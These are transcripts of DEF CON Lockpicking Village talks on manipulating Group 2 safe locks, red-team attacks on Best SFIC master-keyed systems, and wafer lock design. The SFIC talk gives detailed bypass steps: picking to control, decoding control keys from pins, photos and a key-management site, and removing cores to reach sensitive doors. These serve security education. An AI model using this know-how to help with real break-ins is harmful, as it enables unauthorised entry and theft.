we will throw the first wheel off by 10, 10 numbers lower. Now we found 40 with left rotation. So whenever we put one of the wheels on 40, it always has to be with left rotation. So for the first number, we will use right rotation to 30. We pick up all the wheels, so four rotations, to 30, with right rotation.
And then we spin left three times to 40. So that puts the second and third wheels on 40. And we will measure the contact area here. And here it is important to take both left and right contact points. And then what you want to do is figure out the space between them. So if it is at 96 and 3, that is a seven-number difference. So we would write down seven and record that. And then we do the same with the second wheel. We put the first wheel on the correct number, so left four times to 40. And then go right three times to 30, putting the second wheel on the wrong number, throwing it off by 10 lower. And then left to 40 on the third wheel. Record the space between the contact points, how many numbers there are, and write that down. Now we do that again for the third wheel. Left rotation four times to 40, and right twice to 30. That ensures that only one number is off; the other two wheels are on the correct number. And then you can repeat with 50 as well instead of 30; that would be the high test. Now, the test combination with the widest contact area is the one that 40 belongs to. For instance, we did three test combinations here for this low test. Say that for the last sequence we dialed, 40, 40, 30, the contact area has the most space between the contact points. Now, normally before, we were looking for closer contact points, but here we're looking for the furthest apart. And the reason for that is because we have the correct number on two of the wheels, and the wrong one on one of the wheels. So if the wrong one is on, let's say, the third wheel, and the third wheel really has 40: we're intentionally putting on the wrong number, so it's going to be a wider contact area. But the other two tests have the correct number on that wheel, so they'll be closer. So this allows us to figure out which wheel 40 belongs to, simply by putting the correct number on each wheel twice and then having it off on one of the tests.
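The decision rule of the high and low tests fits in a couple of lines. Again, this is a hypothetical sketch of mine, assuming you have already measured the contact-point spread for each of the three test combinations: the test that deliberately sets a given wheel wrong and still shows the widest spread is the one naming the wheel the number belongs to.

```python
# Given the measured contact-point spread (in dial numbers) for each
# high/low test, pick the wheel the candidate number belongs to.
# Keys are which wheel was deliberately thrown off by 10 in that
# test; the widest spread means no gate was under the fence there.
def wheel_for_number(spreads):
    return max(spreads, key=spreads.get)

# Made-up readings for the talk's example, where 40 turns out to
# belong to wheel three:
spreads = {1: 5.5, 2: 5.5, 3: 7.0}
print(wheel_for_number(spreads))  # → 3
```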
So if wheel three has 30 and the contact area is wider here than in the other two tests, then we can successfully conclude that 40 belongs to the third wheel, the third number in the combination. And then you can repeat with 50 just to really be sure that your readings are correct. So we're going to assume that 40 here is the third number in the combination. And check your rotation any time you dial to a correct number: you want to make sure you always use the correct rotation. Now we found one of the numbers in the combination, and we know it's the third wheel. So in order to find the other numbers, we essentially just repeat the same step with this new information added in. So we run the other two wheels through every two increments, but we have the third wheel on 40 whenever we read the contact point. So the way that this is done: we know that the third wheel is the first wheel that gets picked up, which means we have to set it last, and that is with left rotation to 40. So what we want to do is pick up all the wheels with right rotation now. And then, we'll say, let's start at zero. And then we spin left for one rotation, so that picks up just the third wheel, and we stop on 40. So now we have the third wheel on 40 with left rotation. Now, going to zero isn't going to affect any of the wheels, remember, because we would have to pick up the third wheel in order to affect the rest. So we can safely move around here without fear of disturbing the other wheels. So we can read the contact point again, going from inside the contact area. We can read the right contact point and then graph it. So we just do this graph, and at the top we can maybe just write "wheel three, left, 40," just so we know that we're doing this graph with wheel three on 40 with left rotation. And then what you can do now is you turn right until you reach 40. Now that picks up the third wheel. Go to zero, where the other two wheels are resting together, and that picks up wheels two and one at the same time.
Because remember, we had everything picked up together. We only messed with wheel three in order to put it on 40 by itself. You turn two numbers over, then spin left again, one full rotation, to 40. Go to the contact area and record it down again. And we just do that the whole way around. So here we can repeat the same high-low exercise. So we're going to pretend we found a drop in the graph, and then a rise back up, centered around 80. So we found 80 with right rotation now. So what we're going to do here is a low test. We're going to start with wheel two, and we're going to throw it off by 10, onto 70. So wheel one, we put it on the correct number, 80, with right rotation. So that means we spin right, picking up all the wheels, stopping on 80. Then we spin left, picking up wheels three and two. So we go three times to 70. And then here's where it gets interesting. We need to go to 40 now with left rotation, because we found 40 as the correct number with left rotation for wheel three. But if we were to continue left past 70 onto 40, it would mess up wheel two. So there's actually a clever way to fix this. So we spin right, picking up all the wheels, and then we stop on 80, which is what we found to be one of the other numbers. We spin left one rotation, picking up wheel three, another rotation, picking up wheel two, and we put wheel two with left rotation on 70, which is 10 lower. And then we want to go to 40 for the third wheel. But if we were to keep going left, it would mess up wheel two on 70. So what we do is reverse directions here, pick up wheel three from 70, and go toward 40. But remember, this is not the correct rotation; we're turning right, and we need to be turning left. So we just go past it, let's say to 30, and then we can go left, picking wheel three up at 30 and setting it on 40, at which point we take our contact point readings for our high-low test.
And then again, you would write down the number of increments, the space between the contact points, and then do that with the first wheel. We throw the first wheel off by 10. So we go left to 70 for the first wheel, picking up all the wheels, and then right three times to 80, and then left to 40. So we write down the numbers. Again, we look at which has the widest contact area, and that will tell us where our second number lies, which wheel it belongs to. And usually locks will read this way: it will read the third wheel first, and then the second wheel, and then the first. But sometimes it can go other ways. But following this method, it doesn't really matter which wheel reads first. As long as you know how to dial in these numbers, you can still do it just fine, no matter which wheel reads first. And then here we have two of the numbers in the combination. So let's pretend that 80 belongs to wheel two. So it's a question mark for wheel one. We know 80 is right rotation on wheel two, and 40 is left rotation on wheel three. And the last wheel, you can graph it, but generally you just brute force it. You would just try 0-80-40, 2-80-40, 4-80-40, and so on until it opens. When you're starting out, it is actually a good idea to graph that last wheel as well. Just in case you messed up on the first two and did not find the correct number, it is useful to have that extra information. Now, there are different Group 2 locks. The one I am using here is what is called a Sargent and Greenleaf, an S&G 6730. There are two major variations, the 6730 and the 6741. They operate the same way. You cannot tell by looking at it which one it is. It's just that the 6730 has slightly tighter manufacturing tolerances, which is why I recommend going every two increments on your graph, rather than every two and a half.
But if you know you have a 6741, if it is labeled a 6741, then you can get away with going every two and a half increments, because the tolerances in the manufacturing are not as tight, and you will still be able to find the correct number going every two and a half increments. Now another popular brand is LaGard, the LaGard 3330. They have slightly oval wheels. And the reason for that is the way the insides of the wheels work: there's a certain mechanism that allows you to change the combination, and it puts pressure on the wheels in certain ways. And that just makes them slightly more oval shaped, which means the wheels can essentially mask the gates on other wheels. Maybe none of the wheels is bigger than the others, but they can be aligned so that when they're all picked up and moving together, the oval shape essentially becomes the biggest part of the wheel pack in that location, and that gate is never going to allow the fence to drop lower, because one of the other wheels will be larger in that area. And so it can be rather difficult to work with a LaGard 3330, so I do not recommend starting out with that. There is also Diebold, which makes a lock with a drive cam where, instead of having one side that's more slanted, the contact area is a more uniform U shape. And so in the case of a Diebold Group 2, you want to take both contact points into account, since there will be less variation in each. You want to take both into account and look at the left contact point going up and the right contact point going down. Now, some final tips: you want to be really precise in dialing. You want to not just read to one eighth of an increment, but dial to one eighth of an increment. You want to make sure you're not accidentally dialing 16 and one eighth or 16 and one fourth, because you're going every two increments. So maybe the combination is 15. You don't want to go to 16 and one eighth and have it not open, when maybe on 16 you could detect it.
You can detect that it's the correct number at 16, but not at 16 and one eighth. You want to make sure you're reading the dial from the same angle each time. So if you're looking at the safe lock, you want to make sure you are reading from the same angle. Let's say you're reading it from this angle this time: you don't want to then look at it like this, as that will change where you think that contact point is. So you want to make sure you're really consistent, especially with the amount of force that you use. You want to make sure it's the lightest possible, and you want to make sure it is the same each time. So you want to be really consistent in everything you do. You can also try it with a known combination. Let's say you know the combination is 20, 40, 60. Well, you can test at 20, 40, and 60. You don't have to graph the entirety of the dial. Just to be able to detect how the contact point feels when one of the gates is under the fence and how it feels when it's not, you can graph from, let's say, 10 to 30, so 10 above and 10 below each of the numbers 20, 40, and 60, so that you can tell how the graph is supposed to look. And that is a very, very useful practice to do. You can also remove the back cover of the lock so that you know exactly what's happening, and you can really correlate what you're feeling with what is happening inside the lock. And then if all this fails, you can buy my book. Well, not really. I put it online for free. So it is on Amazon, but I don't recommend it unless you really want a hard copy. There's a PDF I have uploaded at the link down here, and you can download it and basically just do whatever you want with it. I don't care. Now, on YouTube, I have a video series that follows the book. It's similar to this talk, but it's a lot more in depth.
So it covers the different sections that I have covered here in this talk, but with much greater detail, and I also cover additional, more advanced techniques for figuring out the combination faster and with greater precision. There are online forums, such as the link at the bottom here, which points to keypicking.com, and they are very welcoming to newcomers as long as you're able to show that you're not trying to use this knowledge for criminal activities and you're interested in this as a hobby. I mean, people are very welcoming. You can buy locks on eBay. I highly recommend the S&G 6730 or 6741. You can also just search for the S&G 6700 series, and just practice. Practice is the best way to learn. You can read and watch all the content on safecracking and understand everything that's happening, but you cannot develop the touch for feeling the contact point, and you won't develop the sight for reading the contact point, unless you actually practice. And I just remembered I forgot to mention this picture here. In order to read the contact points and dial more accurately, you can take a piece of paper, or maybe a needle or anything, and tape it onto the dial and the dial ring, just to be able to more precisely pinpoint where you are on the dial. And that is the end of this presentation.
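As a recap of the graphing procedure above, here is a minimal sketch of how you might hunt for the dip in your contact-point readings once you have written them down. The readings and the depth threshold below are hypothetical numbers chosen just to show the shape of the search, not measurements from a real lock:

```python
# Hypothetical contact-point readings, one per test number, taken every 2
# increments on a 100-number dial. A lower reading means the fence dropped
# deeper, which is what a gate passing under the fence looks like on the graph.
readings = {pos: 11.5 for pos in range(0, 100, 2)}
readings[16] = 11.125  # the dip: a gate near 16 lets the fence sink slightly

def candidates(readings, depth=0.25):
    """Return test numbers whose reading dips below the baseline by >= depth."""
    baseline = max(readings.values())
    return sorted(p for p, r in readings.items() if baseline - r >= depth)

print(candidates(readings))  # -> [16]
```

Because you only test every second (or every two-and-a-half) number, the dip you find marks a neighborhood: the true combination number is the candidate itself or one of its immediate neighbors within the lock's tolerance.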
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn the hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices, techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools, and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50743 (DOI)
Hey, and welcome to Keystone of the Kingdom. This is a talk on targeting Best SFIC locks, and you'll learn in a second what that is, just in case you don't know. This is a talk being given to DEF CON 28's Lockpicking Village. Unfortunately we have COVID going on in the world and we are not going to be able to meet in person, so I would encourage you to reach out to me on Twitter, or on Discord inside of the DEF CON channel, and I'd love to have your thoughts, your opinions, any questions you have sent my way; I'm happy to discuss. Who am I? My name is Austin Mark. I'm a security enthusiast, first and foremost. I have been doing pen testing for a number of years for a small to mid-market tax, consulting, and audit firm called RSM, doing red team assessments where we regularly run into Best SFIC locks. We see them in the field. On the right hand side you also have my Hack The Box profile, Twitter, and website. Feel free to reach out to me on any of those. And you have a disclaimer: I am not a locksmith. So my thoughts and opinions on how to secure locks should probably only be taken as an attacker's view of things that I think work. Really remediating these issues, or operating your locks, is something that's best left to a locksmith, who can give you better advice than I can. On the left hand side you have a photo of me at IKEA. I don't believe I ever got that mirror, which is unfortunate. But as I was flipping through photos trying to find something that I thought was appropriate for this talk, this was the one that stood out to me. So this is Anthology. This is a collection of talks that I'm giving at DEF CON and, hopefully in years to come, other conferences; this is just how I organize my talks, all under this Anthology brand. On the left hand side you get this little picture of an ant, kind of like a circuit board. That's just my little Anthology symbol. While parts of this lab should be done with locks and keys in hand, I'd really prefer this to be a hands-on talk.
We're going to deal with COVID, and we're going to have some parts of this be a web-based CTF where you can at least learn a little bit about Best SFICs. When we get done with the talk, I will open up the CTF, and anybody who would like to can join in and chase down some flags; there will be a prize for whoever wins. So feel free to reach out if you believe that you're the winner, and I think we'll wrap this up 24 hours after the talk. Down at the bottom you have some logins. You have a CTF login at PCTF.ant.red. That is a CTFd instance that has some challenges, I think something like 10 challenges, kind of running the gamut across the different parts of targeting a Best SFIC system. You also have course materials that just link out to a GitHub page. You can pull down some PDFs and some further learning resources if you're interested in Best SFICs. Then you've got a Keystone Web instance. You'll learn a little bit more in a second about what Keystone Web is. But there it is, out at ksw.ant.red, and down at the bottom you have a login for that. Alright, so let's jump into the agenda. Here's what we're going to try to cover. What are SFICs? What are key marks? It's kind of in the name: the marks on SFIC keys. Where are SFICs, so where are you going to find them? And then, what can we do once we've found them? So first and foremost, what is an SFIC? SFIC stands for Small Format Interchangeable Core. Let's see. Yep, you can see it there. They're a way for businesses to change which key goes to which door quickly. They can also provide a means of access control. So Sally shouldn't be able to go into Jim's room, but the janitor should probably be able to go everywhere, so that janitor needs to be able to get access to both of their rooms. To be able to do that, you have a master key that will open both doors. And to that end, the pins that go inside of these locks are master keyed.
There are a number of different segments, and you'll see in a second what those look like. Moving on from that, where are we going to find SFICs? SFICs are in schools, office buildings, hotels, and very large businesses. So you'll see them very regularly. I remember when I gave this talk, or a talk similar to this, last year at DEF CON, I noticed a ton of SFICs all around me. It's kind of one of those things where you get a new car and all of a sudden everybody is driving your car. This is kind of the same thing: you figure out that you have an interest in SFICs, and suddenly everybody has an SFIC and it's always something to look at. So what are key marks? Key marks are exactly what they sound like. It's simply a stamp that is put on a key for tracking. It should help you know whether a key goes to a door, and it'll also help you track who has access to what. So what can we do once we know that there's an SFIC that is part of this environment we're targeting? We could potentially just pick it. We can potentially duplicate some of those keys. If we're able to get access to them, we're able to move laterally with those keys, because they are part of the system. So if you know where you are within a system, you can potentially move from one door to another. And that all gets done by what is called system decoding, and we'll walk through some of what that is and how we do it. Alright, so we'll talk a little more about what these SFICs really are. An SFIC, as it would be installed, is on the left hand side. You can see on the front you've got a core mark of what appears to be PG7, and it says Best, so you definitely know you're dealing with a Best SFIC rather than another manufacturer's SFIC. For this talk, we will be specifically talking about Best A2 system SFICs, which are the most common. These are the ones that I see the most often in the field.
This is a door that would only be openable by the PG7 key, or another master key, or a key that is mastered to the PG7 core mark. So if I were to get a key at an elevated part of the hierarchy, I could also operationally open this door. You also have a control key. A control key can pull the core from any door in a system. They're particularly sensitive, and we'll talk a little bit about how to get access to those in a bit. So, on the inside of an SFIC: this one has been fully gutted, so you don't really have any pins in here, but it helps us walk through what the different items are. There is a cap that typically goes in the top. You have an operating shear line that will allow this to turn freely, which would move these throw pins and unlock a door. Or, if the control pins are set in such a way that the control lug would turn, this would allow the core to rotate and pull in the control lug, which would let you remove the core from the door. So those are the parts and pieces of an SFIC core. We'll have an exploded picture after this that should explain that a little further. And really the goal of this slide is to make sure you're familiar with the control lug, which allows this to be placed in a door, secured to a door, and then operated with operating keys. Cool. Alright. So IC cores, these are interchangeable cores. On the left hand side, you have a standard housing that will typically hold one of these cores. It's not exclusively these in-door cores; you might actually have a padlock, much like this one. So you could potentially gain access to one of these, and when we start talking about removing cores and walking off with something and gaining access to the full system because you have something in hand, something like a padlock is particularly useful. Right.
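To make the two shear lines a bit more concrete, here is a toy model in code. The shear-line heights and pin sizes below are made-up illustrative numbers, not Best's actual specifications; the point is only that a single pin stack can line up with either of two different shear lines depending on how high the key lifts it:

```python
# Toy model of one SFIC pin chamber. Assumption (hypothetical numbers): the key
# cut plus the pins above it must sum exactly to a shear-line height to rotate.
OPERATING_SHEAR = 13  # total stack height at the operating shear line
CONTROL_SHEAR = 23    # the control shear line sits higher in the chamber

def shears_at(key_cut, bottom_pin, master_wafers=()):
    """Return which shear lines a chamber lines up with for a given key cut."""
    stack = key_cut + bottom_pin + sum(master_wafers)
    lines = []
    if stack == OPERATING_SHEAR:
        lines.append("operating")
    if stack == CONTROL_SHEAR:
        lines.append("control")
    return lines

print(shears_at(key_cut=4, bottom_pin=9))                       # -> ['operating']
print(shears_at(key_cut=4, bottom_pin=9, master_wafers=(10,)))  # -> ['control']
```

A control key, in this model, is simply one whose cuts push every chamber's stack to the higher constant instead of the lower one, which is why it frees the control lug rather than turning the plug operationally.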
And then on the right hand side, you have an exploded version where you can see the key, the plug, the bottom pins, the cylinder cover, the cylinder itself, and all of the segments we talked about; that's part of that master keying. And then your springs and your top pins, which you will be bumping out if you're going to gut one of these locks. Moving on, let's talk about SFIC keys. So these are SFIC keys, like this. And you can see on the front there a key mark. In our screenshot, it's BA1. On the one in hand, it is SR1. On the key in hand, we also have a keyway marking that is H, if you can see that, I hope. And then there's also keyway mark A on the key in the picture. The serialization marking is particularly useful for tracking multiples of the same key. So let's say we had 10 of these, and I wanted to know if Stu lost his copy of the key. I'd like to be able to know which key is missing by taking account of all the keys and saying, hey, we're missing this specific serialization. Stu, what happened? I thought we trusted you with that key. And then lastly there's just this tip stop. So let's talk about systems. This is the hierarchy of a Best SFIC system. At the top, you have the control. The control key works in every core within a system and allows you to remove one of these SFIC cores from the door. And if you can remove a core, you can decode the entire system. We'll talk a little bit about what that means and what the impact of that is. But if you can get a control key, you're golden. If you can get a grandmaster key, you're also golden. A grandmaster key will operationally turn every lock within the system. So if you can grab a grandmaster key, you can open up any door within that system. Typically you'll see GM written on a key that is a grandmaster key. So if you can find a key on a lanyard or sitting on a desk that says GM, that might be one to take a picture of, or borrow for a moment, or what have you.
Typically if there are different systems within, there might be a master of system A, a master of system B, and those are just submasters. So many times you'll see them written as MA, MB, MC, MD. It's not a hard and fast rule; it doesn't have to be true. It's just a general thing that has been observed over the years. Operating keys. As we've discussed, these are keys that you typically give an authorized user to access their office or their door or the server room or some other sensitive area. I've been told by a number of college students that they see these operating keys, or they're given them as part of their dorms. So maybe they have the operating key to their door, and a submaster belongs to whoever runs that part of the dormitory. A CA, I think they call it. So moving on. Keyways. Let's talk a little bit about keyways. The Best SFIC keyways are a part of their key control system. The keyways are intended to increase the complexity of an attack against Best SFICs. So if I were to hold up this Best SFIC, which has what I believe to be an H keyway, and pop this key in there, it works, no problem. It fits in there, no issue whatsoever. And then if I were to hold these two SFIC keys together, you should see they're very different, very different cuts. So unfortunately, even though this is a completely empty keyway, I'm not going to be able to fit that key in there. And that's just a function of the key control of the Best SFIC family. In the middle, you can see a chart of all the different keyways that Best offers on their standard, non-CORMAX, non-overly-complicated Best cores. Again, this specific talk is just going to be about Best SFICs inside of the A2 system, because these are the most common ones that I see. There are also multi-keyway keys. So this is kind of exciting. If you take a look at the WA, WB, WC items on your chart, you'll see that those keyways are kind of similar.
So you could potentially have a single key that works for all three, and this just adds additional complexity and mastering opportunities between different Best SFIC cores. On the right hand side, you can see a Falcon multiplex family set of core keyways. I think it's just a good example: an all-section key up at the top, then two multi-section keys that are kind of unique, and then it steps down into single-section keys, and then another keyway that would potentially be openable by all of the keys above it. So moving on. Let's talk about lateral movement. This item here on the right is straight from a code book. A code book is something a locksmith uses to track what the key codes are for a key. If you hold this key up, you can see the bitting, and that bitting directly relates to the key code. So if you can get a key code, you can cut a key. Up at the top, you have SMBA, so that's a submaster for the BA system, and then you have a couple of other keys that are part of the BA system. Alright, so if you look, there is actually a pattern going on between the fifth and sixth columns of the key code, where it kind of steps up by two and then down, or vice versa. It could be, if you're going from the third column from the right to the column second from the right, that you're going down and then up, up, up, and you're cycling every four by two. It's a lot easier for me to show you a video of what this actually looks like, because it looks a little complicated here, but there is definitely a pattern that you can abuse. So potentially you can move laterally. Alright, so we talked a little bit about the keys themselves and the key codes and what they mean. Let's talk about what happens if you get a key in hand.
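Before that, the stepped code-book pattern just described can be sketched in a few lines. This is a hypothetical illustration of two-step progression in a single column, not the layout of any real Best code book:

```python
# Hypothetical sketch of two-step progression in one column of an A2 code book.
# Sibling change keys differ by steps of 2 in a progressed column, so knowing
# one bitting lets you enumerate plausible neighbors to test.
def column_siblings(bitting, column):
    """All bittings reachable by stepping the given column by 2 (depths 0-9)."""
    parity = bitting[column] % 2  # two-step progression preserves parity
    out = []
    for cut in range(parity, 10, 2):
        if cut != bitting[column]:
            b = list(bitting)
            b[column] = cut
            out.append(tuple(b))
    return out

known = (2, 4, 6, 0, 3, 5, 7)
for sibling in column_siblings(known, column=5):
    print(sibling)  # cuts 1, 3, 7, 9 in the sixth column
```

Because the progression preserves parity, one known change key narrows a progressed column to at most five candidate cuts, which is what makes this kind of lateral movement practical.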
If you can get a key in your hand, you could use a key decoder and quickly discern the bitting and recreate the key, or at least get an understanding of where that key goes within a system. And then you could also use calipers. Probably not these little tiny measuring calipers on the right hand side that attach to a key chain, but calipers will measure your pins or the bitting on a key, and you can use that to recreate either a core or the key itself. So if you can get a key or a core in hand, you can definitely duplicate it. Alright, key in photo. You could use one of these decoding charts. These are provided by Deviant Ollam; I find them very useful. Their usefulness depends on the quality of the photo that you take, of course. If you have a photo that's kind of jostled or shot from across the room, it might be a little more difficult to actually make that photo work for you, but with some Photoshop magic, you might be in luck. There's also an app called Snap to Coder. I have had mixed results with this app. Honestly, I haven't gotten much usage out of it, but I figured I'd share it. This app promises to be able to discern the bitting of a key by holding the key up to the app. So in an ideal world, maybe in a future update or maybe an update that I haven't seen, you'd be able to point this app at a key, tell it it's a Best SFIC key, and it will tell you the bitting; then you can go off site, recreate that key, and start opening doors right then and there. So these are two ways that you could take a key and a photo, using a decoding chart or an app, and start to understand what the bitting is for that key, and potentially recreate it before handing it back to a mark, or having to leave it somewhere so you're not being detected. All right, cool. So we talked about key in hand, key in photo; what about key on web? So, keys on websites that are Active Directory integrated.
That sounds great to me as an attacker. As a red teamer, I'm always targeting Active Directory; that's something we're always looking for, a way to move laterally within AD. Keystone Web is an Active Directory managed and Active Directory joined website where, in their phrasing, it will help the user manage keys and core records for multiple personnel throughout various locations. This product allows for importing and appending data, mass deletes for employees, key-door and door-key data, and an activity log that tracks user transactions. So if we add a new employee, maybe he gets a new key to his door. If I have access to this website, I know exactly what that key is. And then I also know the master key, right? So if I look on the right hand side here, you see the master key code is 8301836. If I recreate a key with that code, I can now open every door within that system. And then you also see the control key bitting. So that one was 4189250. That's particularly useful, because it tells me I can now start removing some of these cores from the system if I want to, and adding my own, for potential denial of service of course, but there may be more interesting things that you can do by swapping out a core. You might be able to start decoding the system if you don't have access to something as powerful as Keystone Web. We can also see up at the top the system type, which is an A2 system. I know we spoke about specifically targeting Best SFIC A2 systems, and that's what we would be targeting here. We see the keyway for this system, so this is an A keyway system. And we see it's a 7-pin system, so we know that we're going to be working with 7-pin locks. The majority of the Best SFIC systems I see are 7-pin systems. Part of what makes them difficult to pick is the fact that they're 7 pins, but also that they have master keying, and because they have master keying, it's very easy for those master wafers to fall as you're picking.
And it's very hard to line them up consistently with what would be an actual operating bitting. But we will talk a little bit about picking to control, and that's something you would do if the core is in the door. If the core is in the door, you can pick to control with a Peterson I-Core tensioning tool. This is a type A tool; it is for tensioning an SFIC. What it's doing is putting pressure on the bottom of the core inside of those holes that we saw, these same holes here, if you can see that. Those holes are getting tensioned by this tool, and that forces pressure onto where the control pins would be. And because there's now pressure there, when you pick the lock, you have a higher likelihood of picking to control. And if you pick to control, you could potentially get the core out of the door, which would be great, because now we can open that door, but we can also replace the core with a core of our choosing, or begin to decode the system. We'll talk about that just after this. There is another option. You could do what is referred to as bitch picking. It's not my name for it. But that's basically jamming a pick inside of a Best SFIC over and over again, fairly aggressively. These locks are actually fairly prone to that, something to do with the way that master wafers work. A lot of times you'll get lucky enough to pick to control, and if you're able to do that, you kind of have the keys to the kingdom: you can decode every part of the system once a core is in your hand. Then I also have a photo of the Lishi Best SFIC 2-in-1. This is a decoder for Best SFIC locks: you can decode the operating key as you pick. So you put tension on the core, and you're able to decode it using the chart on the right hand side. They're a little spendy, so I don't carry one, but I do have a couple for non-Best SFICs. Cool. So, core in hand. Let's say we're able to get one of these cores in hand.
What we might want to do is pull the pins out, so we can actually understand how the system works and decode that system. So we might 3D print one of these. This is an SFIC pin extraction tool, or re-pinning tool. Red Cat Imaging put this out on Thingiverse; I strongly recommend you go pull it down from there. A standard all-metal version of this goes for well over $100 everywhere I've ever seen them, and a 3D printed version is pennies. And they work beautifully. From what I've been told, they're not an easy print, but if you pull one down and run it through a printer, apparently people have been fairly successful. I had a friend print this off for me, and it works great. Essentially you're going to take your SFIC and pop it inside. You can hammer the pins out a number of different ways; some people like to use something like a flat pin that you stick in the top of one of these holes to knock the pins out of the bottom. So what you're going to do is pop the caps on the back here, and hopefully all of that gets collected, hopefully just the top caps, and then you can slowly remove the rest of your pins. Really, what you're interested in is the top pins. So we're going to talk a little bit about decoding pins. Alright, so we've extracted the pins, we've hammered them out, and you can see I've got them sitting inside a little Sparrows tray with the top pins up top. And we can begin to measure those. There are my calipers on the right hand side. We were able to measure them, and for whatever reason this is in millimeters, but it needs to be converted to inches for the chart, which is provided by, I believe this was from Best. And it comes out, for this specific pin that I was measuring, to .07. That .07 pin lines up with a 6B pin. So we know that that top pin is a 6B pin. So that helps us understand, okay, so here's our top pins.
Here's what each of these items is, if we want to recreate this core. But where this gets really helpful and really, really interesting is when we start to decode a system using a decoding chart, like this one. You can fill this out with your top pins, your build-up pins, and master pins, if there are any, and of course there typically will be in a lock like this. And then you will subtract the measure of your top pin from 13, and that will give you the control key bitting. As we discussed, a control key bitting is something you can use to create a control key, and a control key can open every lock in the system. If you can open every lock in the system, you can go into any door in the organization that you're targeting. So if you can gain access to, you know, a lock like this, or perhaps the core of a bathroom or something that's non-sensitive, and you're able to decode the control key, you can leave, come back with that control key, and start removing cores from very sensitive doors that you'd like to gain access to. And that's it for this talk, Keystone of the Kingdom, a talk about targeting Best SFIC locks. I would ask for a Q&A here now, but because this is COVID and fully remote, we can't do that. But I would encourage you to reach out to me on Twitter, send me a DM on Discord, and don't be a stranger. Feel free to reach out, give me your thoughts, ask questions. If something wasn't clear, let me know, and I welcome it. So thank you.
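The decoding arithmetic described in the talk, subtracting each top pin from 13 to get the control cut, is simple enough to sketch. The pin stack below is a hypothetical example, and the 0.0125 inch step is the commonly quoted A2 increment; treat both as assumptions rather than a decode of any real system:

```python
# Hypothetical decode of a seven-pin Best A2 core, following the rule stated in
# the talk: control cut = 13 minus the decoded top (control/build-up) pin size.
A2_INCREMENT = 0.0125  # inches per depth step, the commonly quoted A2 value

def pin_size_from_inches(length_in):
    """Convert a caliper measurement in inches to a pin size in depth steps."""
    return round(length_in / A2_INCREMENT)

def control_bitting(top_pins):
    return [13 - p for p in top_pins]

top_pins = [9, 12, 5, 4, 4, 11, 8]  # example sizes decoded from the stacks
print(control_bitting(top_pins))    # -> [4, 1, 8, 9, 9, 2, 5]
```

As a sanity check on the conversion, a measured length of .07 inches works out to a size 6 pin under this increment, which lines up with the 6B decode mentioned in the talk.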
10.5446/50745 (DOI)
Welcome to my talk. I'm going to be chatting about wafer locks today and why they're awesome. It's going to be very theoretical, and it's going to be coming at this mainly from the lock engineer's perspective, if I might be able to flatter myself. I'll start by telling you a bit about who I am, then I'll cover some definitions so we're all on the same page, and then I'll show you a small selection of wafer locks through my eyes. So, who is this loon who thinks wafer locks are pretty secure? Well, it all started about three years ago when I thought it would be a good idea to design a challenge lock for HuxleyPig69, who is renowned in the lockpicking community for being the first person to publicly pick the Abloy Classic, and who designs tools for cracking high security locks non-destructively. In the last year or so of this now three-year journey, most of my focus has been taken up by wafer locks, and that's not because I've finally broken down mentally and started rambling, but rather because I genuinely think they offer a good solution to the problem of designing a high security lock. So, what makes a lock high security? Well, a lock is a reusable seal which has two important properties. It's got to be tamper evident, so that if the lock is defeated, it's obvious. And the second important feature is that defeating the lock should take as long as possible. Ideally, you're able to preclude covert and surreptitious attacks, and ideally an overt entry will take forever. An overt entry is one that is immediately obvious; that's typically destructive attacks like drilling or using explosives. Covert entry is an attack on a lock that won't be immediately obvious to casual observation, but if you were to strip the lock down and analyze it forensically, it would reveal what method was used to open it. This normally covers lock picking and impressioning, because they leave small scratches and marks on the inside of the lock.
And finally, there are surreptitious attacks, which don't leave any forensic trace whatsoever; this would be stuff like duplicating the key from a photograph. How high security a lock is, is determined by the amount of time it takes to compromise the lock with an attack in each of those categories. Ideally, you wouldn't be measuring that in seconds. Ideally, you'd be measuring it in minutes, or, in a really, really good world where security engineers are doing a fantastic job, in hours. So since high security locks are designed to make lock picking and impressioning attacks as difficult as possible, if not impossible, a lot of them have been designed with some very wacky mechanisms. So you can't always take the approach that you would normally take picking a pin tumbler lock and apply it directly to a high security lock. Instead, I've abstracted the lock picking process into these four requirements. You need to be able to get feedback from the lock, because that's how you tell what state the lock is in and how close you are to having it open; it also tells you what your next step might be to get the lock open. You need to be able to manipulate and tension the lock simultaneously. Some locks, like the Western Electric 30C or the Abloy Protec2, have blocking mechanisms that, while not preventing manipulation or tension, prevent you from doing both at the same time, and so they're phenomenally difficult locks to pick as a result. By tension, I mean applying a force on the lock in the direction that drives it to open. How you do that depends on the particular kind of lock. The key idea behind this is that since it's impossible to manufacture the components of the lock perfectly, you have manufacturing tolerances, and these tolerances result in every single component being very slightly differently sized or shaped, which then causes them all to behave very slightly differently.
And that's the case regardless of how well you machine the parts, and regardless of whether you have a very low quality lock or a very high quality lock. And finally, manipulation. Manipulation is just the ability to move the components inside the lock with a tool of some design. Those are the things to keep in mind when I start taking you through these locks. So what is a wafer lock? This should be pretty straightforward, but apparently for some people it's not quite so clear. Some of those people I happen to have a lot of respect for, so this is not a criticism of them, but I do disagree, and the reason I sometimes disagree about whether or not a lock is a wafer lock is because of how I define it. If you're working off a different definition, then obviously in some cases you're going to get a different answer. So we've got some typical sliders shown in the top corner here. These two are from an Acidesmo, which is a reasonably high security lock, but not one that I would deem high security for the purposes of this talk. And these are from a cheap slide lock that is not a wafer lock. In both cases they slide laterally, and they have to be slid the correct distance to allow the lock to open. A wafer lock is a special kind of slide lock where the total length of the wafer is the same as the width of the core that the wafers actually sit in. So here's an animation to make that a little bit clearer. When the wafer is incorrectly positioned, it sticks out on one side or the other and prevents rotation. When it's positioned perfectly in the center, it will allow rotation. So to start things off, let's take a look at the kind of wafer lock that you're probably familiar with, the kind of thing that probably sprang to mind when you first read the words wafer lock, if you've had any prior experience.
